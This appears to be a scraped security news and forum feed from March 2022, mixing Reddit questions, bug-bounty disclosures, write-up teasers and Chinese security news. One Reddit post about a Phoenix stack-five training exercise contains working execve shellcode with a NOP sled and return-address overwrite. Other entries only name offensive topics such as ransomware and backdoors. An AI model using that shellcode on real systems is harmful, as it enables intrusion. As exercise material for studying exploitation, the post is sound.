• Open

    Threat Model Stakeholders from a security team?
    Who are the appropriate personnel to include in a threat model from a security standpoint? Security Architects? Engineers? SOC analysts?? Vulnerability management personnel? Compliance? submitted by /u/bankster24 [link] [comments]
    RBAC question
    Hello, I am not in cyber however I am developing an org structure as part of my school assignment. The roles I came up with that are part of driving the RBAC implementation are: Role Dev Lead, Role Eng. Lead, Role Decomm. Lead, Role Maint. Lead and Auditor Lead. Are they close to RL roles? Thanks! submitted by /u/Hav0c_wreack3r [link] [comments]

  • Open

    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, eg fiber, cable, DSL,etc submitted by /u/computerstuffs [link] [comments]
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3 [link] [comments]
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104 [link] [comments]
    How to open 120 GB SQL file than without my pc ?
    My SSD is low capacity, how to open ? submitted by /u/mefumetsub [link] [comments]
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz [link] [comments]
    Can url/ip of microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservice. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to found where is that microservice and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy [link] [comments]
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid [link] [comments]
    Tool to manage vulnerabilities from different sources?
    OK so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open sorce) We're not looking for anything that will run its own scans; rather, manages already found reports... if that makes sense. At the moment, we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow [link] [comments]
    Sandvine technology for newbie
    Hello, My friend worked in Blueteam domain as Network security mostly on Firewalls, WAF, IPS etc. solutions. He lost his job earlier and saw an opening at Sandvine which he applied and got a call for interview but he is not sure what type of questions expected. Appreciate if anyone can advise what should he study and what type of questions to be expected and response. TIA submitted by /u/junostik [link] [comments]
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT Security Labs, and check items out of date such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG [link] [comments]
  • Open

    GRAPHQL cross-tenant IDOR giving write access thought the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402
  • Open

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the google cloud console for products “https://console.cloud.google.com” to look for bugs i came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
    Hello Hackers and Security community. I’m going to share how I’m able find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SOLD all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    Misconfiguration OAuth Lead Account Takeover #Part 2
    Here are my bounty bug findings regarding Misconfiguration OAuth Lead Account takeover Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created By Python For Finding Username Of Your Target Websits…
    Hi guys in this tutorial you will learn how to create python script for finding username of admin panel of target wordpress website and… Continue reading on Medium »
  • Open

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury [link] [comments]
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut [link] [comments]
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley [link] [comments]
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster [link] [comments]
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303 [link] [comments]
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra [link] [comments]
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM [link] [comments]
  • Open

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link Film Dokumenter Bellingcat — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Kabar gembira hari ini. Sumbubotol.com mengucapkan selamat kepada Submarine Amsterdam yang berhasil… Continue reading on Sumbu Botol »
  • Open

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10
  • Open

    【安全通报】Linux DirtyPipe本地权限提升漏洞 (CVE-2022-...
    近日,网络上出现 Linux 下 DirtyPipe 本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目...
  • Open

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0
  • Open

    Extended Attributes and TCC on macOS
    This blogpost will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS Continue reading on Medium »
  • Open

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010 [link] [comments]
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin [link] [comments]
  • Open

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.
  • Open

    新一代银行木马SharkBot正通过Play Store传播
    SharkBot是一种银行木马,它能够绕过多因素身份验证机制窃取银行账户凭据。
    FreeBuf早报 | 谷歌要求撤销数据泄露诉讼案被驳回;英伟达泄露数据被用于病毒制作
    Alphabet股东起诉谷歌,由于谷歌故意隐瞒安全漏洞,导致用户私人数据泄露。2018年10月,有美国媒体报道称,该事件导致谷歌+近50万用户的个人数据泄露。
    全球黑客卷入乌俄乱局!数字网络战的背后值得深思
    这是数字时代首次爆发的,多个国家级黑客力量入局,且以国家为打击目标,破坏核心关键基础设施的全球级黑客网络战! 【导语】2月24日,乌克兰与俄罗斯之间
    容器安全在野攻击调查
    云原生安全相关的公司雨后春笋般建立起来,各个大云厂商也积极建立自己云原生的安全能力,保护云上客户的资产。
    速看! 2021-2022年23项重大网络犯罪统计数据
    自新冠疫情以来,网络犯罪一直呈上升趋势。专注网络安全的锐成信息在此搜集了2021年最值得注意的网络犯罪统计数据以及行业专家对2022年的互联网安全趋势预测。</
    3月9日相约CIS 2021春日版直播间,万元红包雨等你来抢!
    3月9-10日上午9点30分,锁定CIS2021 Spring·春日版官网,超棒的议题、超nice的有奖活动正等待着您。
    “以数据为中心”的数安实践感悟
    从传统的运营商、能源、医疗、金融等行业,到新兴的互联网行业,都掀起了数据安全建设的浪潮。
    白帽专访丨大家好,我是阿杨,一个全职挖洞的选手!
    「用梦想和勇气去创造,用信念和努力去证明。」 大家好,我是阿杨,自学渗透测试入门安全圈,目前是The loner安全团队的全职挖洞选手,擅长挖掘业务逻辑漏洞,并收获丰厚的奖金激励。
    Firefox再爆两个0Day漏洞,建议尽早升级
    近日,Mozilla对火狐(Firefox)网络浏览器进行了带外安全更新,其中包含了两个影响很大的安全漏洞。
    黑客组织入侵俄罗斯媒体,播放乌克兰战争画面
    俄罗斯媒体遭受网络攻击,出现乌克兰境内的战争画面。
    Metasploit本地使用指南
    在平时做项目的时候,每次开启虚拟机使用会很不方便,配置低的电脑后台开多了还会出现卡顿现象。主要还是在本地安装使用更加的方便快捷,提高了效率。也可以部署在vps等,方便对内网进行渗透。
    FBI:美国52个关键基础设施已被入侵
    截至2022年1月,FBI已经确定,在受攻击的10个关键基础设施中,至少有52个关键基础设施被入侵,涉及关键制造业、能源、金融服务、政府和信息技术领域等领域。
    三星证实黑客窃取了Galaxy设备源代码
    三星于周一证实了其网络遭到了黑客入侵,包括Galaxy手机的源代码在内的机密信息被窃取。
    Coinbase正封锁超25000个与俄罗斯有关的加密货币地址
    3月7日,流行的加密货币交易所 Coinbase宣布,正在封锁25000多个与俄罗斯自然人和实体相关的加密货币地址。
  • Open

    Movies from 1940 until last weekend! Busy site so starts slow(That’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]

  • Open

    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing makes people fool. Phishing email always looks like same as the… Continue reading on Medium »
  • Open

    Why do ISP ask for your SSN when signing up for their services?
    When I was singing up for spectrum they asked for my SSN, I gave to them since. How scared am I? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was but don't know where I put special characters or capital letters. I'm not good with git hub so is there a non-Github program that will let me enter the known parts, I can tell it to try every possible character in certain spaces, and only lower case and uppercase of certain letters i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently noticed activity that I didn't really remember doing on an account, but it was from my exact ip address. I have a limited understanding of ip addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" ip, right? . submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me. They're hacking all my devices and families devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm a South African, I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since, all they have to do is stop hacking me, then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then, I have since countless spam emails, and several times a day, I have been notified of membership registration and logout for sites that I do not need to log in at all the time. After that, I found out that something was wrong. Perhaps attacked by phishing. The Facebook site on the link I entered was a well-made site very similar to a normal site. In addition, there was no doubt at all because it was possible to log in, search, news articles, and content within the site. Banners, search windows, newsstand windows, login windows, and putters at the bottom were configured in a very similar way. And as a result, I had no choice but to renew all my personal contact information and e-mail addresses. I've only encountered the kind of writing to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check if the domain is normal when receiving e-mails or text messages containing links. So I want to ask. What is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines a link to a web page normal or dangerous when i enter suspicious link to search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non IT background. Could you please suggest some good basic references/trainings that she can learn from. I know of some CCNA and Comptia instructors who start from quite basics but wanted to check if there is some other non certifications course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to prefix this with me saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in the case the order does happen. If we have vendors that hold offices in Russia and can access to our VPN (let's also assume we do not have control over our vendor's offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks? (at least directly?) Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]
  • Open

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]
  • Open

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]
  • Open

    A new speed milestone for Chrome
    Everyday, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That’s why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We’re excited to announce that in M99, Chrome on Mac has ach…
  • Open

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs along with an overview about how it was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »
  • Open

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232
  • Open

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle [link] [comments]
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    Computer Forensics and Investigation Project
    Hi Team, Need suggestions for any websites where I can find a reference scenario of a cybercrime where you have to do a computer forensics on a victims PC. For example a hacking incident, you have to verify of investigate how he/she was hacked. The report shall include the creation of a hypothetical scenario of a crime committed involving the said electronic device, as well as, a detailed description of the forensic examination, tools used, procedure, and findings, evidenced with the necessary screenshots and ensure all screenshots have the necessary verifiable names. This is a school project for my cybersecurity program and it is only my term 1. ​ Thank you so much! submitted by /u/bankshot15 [link] [comments]
    Avoid modifying the smartphone evidence
    To present forensic analysis in the court, we can't modify smarphone evidence, although i have put android phone in airplane mode, i still worry about modifying smartphone data during cellebrite ufed phone extraction, how to avoid tempate evidence during extraction? for linux image analysis, i can mount as read only, how about smartphone? submitted by /u/cyberfo [link] [comments]
    How do I get Laptop serial number from E01 image?
    Yep..someone fucked up the chain of custody forms submitted by /u/MasterBet [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
    dns posioning or dns hijacking
    we encounter a lot of packages with small ttl in our pcap files, is this the symptom of DNS poisoning attack, or dns hijacking or other dns attack, like ddos? submitted by /u/cyberfo [link] [comments]
    how to detect C2 communication from log
    how to detect C2 communication from log, we have method to detect beaconing, but now has difficulty in detect Command and control command, we have no clue, anyone know how to detect it through splunk log? submitted by /u/cyberfo [link] [comments]
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    [THM] Bounty Hacker Writeup
    No content preview
    $$$ Bank Verification Bypass(Broken Object Level Authorisation)
    No content preview
    B̶a̶k̶e̶ Hack your cake!
    No content preview
    [THM] Brooklyn Nine Nine Writeup
    No content preview
    All about Account Takeover
    No content preview
    Agent Sudo | TryHackMe Walkthrough
    No content preview
    Methods to Bypass two-factor Authentication
    No content preview
    Reset password Token led to account takeover
    No content preview
    How to Make Ransomware with Python
    No content preview
  • Open

    基于零信任的远程办公安全技术落地和应用
    基于零信任的远程办公安全方案,可以摆脱主机,轻松保证远程办公业务的连续性。
    工信部发布《车联网网络安全和数据安全标准体系建设指南》
    到2023年底,初步构建起车联网网络安全和数据安全标准体系;到2025年,形成较为完善的车联网网络安全和数据安全标准体系。
    揭秘APT36组织的CapraRat恶意软件
    我们会持续的介绍一些国际上臭名昭著APT组织,让我们更加了解和规避这些恶意的恶意软件。
    网络安全漏洞分析小结
    这里从漏洞点出发,分析漏洞,从中学习一些白盒挖掘漏洞的思路。
    CISA在其积极利用的漏洞目录中增加了95个新漏洞
    美国网络安全和基础设施安全局 (CISA) 本周在其利用漏洞目录中增加了95个新的安全漏洞,使其可利用的漏洞总数达到 478 个。
    都2022年了,密码管理器还安全吗?
    本文将重新审视密码管理器,为大家解答关于密码管理器的若干重要问题。

  • Open

    Telegram kanallarında arama yapmak için Google hacking’i kullanmak
    Telegram’da Putin yanlısı kanallar arıyordum, Google Dork’u kullanma. Bunun da Google hacking’i kullanmanın pratik bir örneği olduğunu… Continue reading on Medium »
    10 OSINT Tools Hackers Need to Know About
    Open source intelligence is a vital task for the red team and blue team alike. Here are some of the most useful OSINT tools. Continue reading on Medium »
    Send Google Alert To Slack
    Automatic Free Crawler By Google Continue reading on Medium »
    Final Recon — OSINT Tool for All-In-One Web Reconnaissance
    Final Recon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be… Continue reading on Medium »
  • Open

    help with making money
    Hey everyone I would like to join the security game. i have a background in programming, how computers and software works what is the fastest way to make money in the security field? I'm here not only for money i really like this field but i need to make money fast i have pills to pay and i can't get a job appreciate any help and guide submitted by /u/timet0fly [link] [comments]
    AlienVault OSSIM - Step by Step Tuning after Installation
    Hi there, I'm interested to test this SIEM for education purposes. I downloaded the latest version from the official site and installed it on my VMware. But I stumbled upon the fact that I do not fully understand how best to configure everything. I did not find any deep step-by-step documentation on the official portal. And most likely I can miss a lot through undetailed documentation. Do I understand correctly that Suricata works out of the box? I don't need to install an agent on a Windows host? When I installed HIDS on my Windows host, I had a lot of weird events where the destination IP is displayed - 0.0.0.0. And I don't even know how to make a rule, so these events are not reflected. I googled and other people had such problems and there is no solution. Who works a lot with this SIEM, perhaps from your experience, you could share recommendations on what to do, what to do after installing this SIEM. I also haven't fully figured out how to run FIM. submitted by /u/athanielx [link] [comments]
    Is it possible to be hacked by private networks/hidden SSIDS near your area?
    I believe my neighbors are watching me using private networks. I have have an app that shows hidden SSIDs. I think they are using these networks to see and listen to what I'm doing on my devices. submitted by /u/AshuraSenkuu [link] [comments]
    Potential drive-by 0-click 0-day on chrome
    There is an on going bug in chrome that allows attackers to download files in the background into the victims machine without triggering any gui updates, I first experienced this about two moths ago when I was trying to close the browser only to be interrupted by a chrome prompt informing me that there are ongoing downloads in the background that weren't started by me and display no sign of the downloading process on chrome's gui. I was a bit alarmed but I didn't pay it too much attention. Then I got curious when yesterday I had the same experience again, this time obviously I clicked 'continue downloads', I was taken to chrome download page where I found that chrome had intercepted and flagged a 'malicious file' and it was offering me to either 'keep' or 'discard' said file, regrettably …
  • Open

    Frelatage: A new Coverage-Based Python fuzzing library
    Hello everyone ! I am a 21 year old french cybersecurity enthusiast and I would like to share with you Frelatage, which is a tool I wrote ! It is a coverage-based Python fuzzing library which can be used to fuzz python code. The development of Frelatage was inspired by various other fuzzers, including AFL/AFL++, Atheris and PyFuzzer.The main purpose of the project is to take advantage of the best features of these fuzzers and gather them together into a new tool in order to efficiently fuzz python applications. Please note that the project is still in early alpha, and its development is very active, so any advice or suggestion is welcomed ! Install: https://github.com/Rog3rSm1th/Frelatage https://i.redd.it/m88potyk9tl81.gif submitted by /u/FrenchFuzzer [link] [comments]
    Shellcode Buff Overflow Question
    As I was going through protostar Phoenix Stack overflows I came across something on the Stack-Five exercise that I don't quite understand on amd64. https://exploit.education/phoenix/stack-five/ Basically I can get the exploit to work when the nop sled is 80 characters long but when I have it 88 characters long I get a seg fault. This Works t.sendline('\x90'*80 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*29 + pwn.p64(0x7fffffffe5d0)) ​ This gives a segfault t.sendline('\x90'*88 + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + 'h'*21 + pwn.p64(0x7fffffffe5d0)) ​ Does anyone know why the second one doesn't work? submitted by /u/Jasonsaccount [link] [comments]
  • Open

    Backdooring WordPress using PyShell
    submitted by /u/jonas02 [link] [comments]
    Escaping privileged containers for fun.
    submitted by /u/JordyZomer [link] [comments]
  • Open

    Going beyond the surface: Vulns that pay well
    These days bug bounty hunters have been finding many low hanging fruits and a lot of them want to go beyond those bugs. This blog is for… Continue reading on InfoSec Write-ups »
    All About Access Control Part-1
    Hello Myself Manan Aggarwal a student from the BTech CSE is here to Present you the Blog about the All About the Access Control Part-1… Continue reading on Medium »
    A short story of IDOR for your perspective
    Hi all, I hope all is well. In this story, I’ll explain an idor bug which I found in a private bug bounty program. This story will very… Continue reading on Medium »
    SSRFire - an automated SSRF finder
    An automated SSRF finder. Just give the domain name and your server and chill! ;) It also has options to find XSS and open redirects. Continue reading on Medium »
    WhatsApp Bug Bounty: Bypassing biometric authentication using voip
    Bypassing biometric authentication just by making a call and access the app completely Continue reading on InfoSec Write-ups »
    HOF In 3 Minute Using Low Hanging Fruits
    Hello, Security Guys & Hacker In this Write Up I am Going to tell you about Continue reading on Medium »
    Response Manipulation leads to Account Takeover
    This is a short story about my recent bug hunting on a private program. This program mainly relies on OTP to check user’s authentication… Continue reading on Techiepedia »
    Weak Registration Implementation
    Let us learn some P4 bugs Continue reading on Medium »
  • Open

    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Unrecoverable and recoverable windows file
    In my forensic image, some deleted files I can recover, some can not. How Encase determine which files are not recoverable internally? For data carving, how Encase retrieve internally those files, are they use same techniques compared with recover deleted files? thanks. submitted by /u/cyberfo [link] [comments]
    X-ways linux image analysis
    in X-ways, if I browse the root directory of image, i found free space, idle space and slack space, can anyone explain what's the different among these these three spaces? in filter attribute, there are SUID/SGID, symlink and special file. I thought suid file are special file, what are the special file X-ways refer to ? symlink means hardlink or soft link? submitted by /u/cyberfo [link] [comments]
    Physical acquisition on unrootable phone?
    Hi all. I'm an intern in computer forensics and I'm trying to perform a physical acquisition on an oppo phone which is unfortunately unrootable as far as I know. I have Cellebrite UFED and MobilEdit but both of them require rooted devices. Any advice for this case? Tysm submitted by /u/juneflorence [link] [comments]
  • Open

    Evading Network Defense with Protocol Manipulation
    Signature based intrusion detection or prevention systems, will detect malicious activity through a predefined signature. If a Red Team… Continue reading on Medium »
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
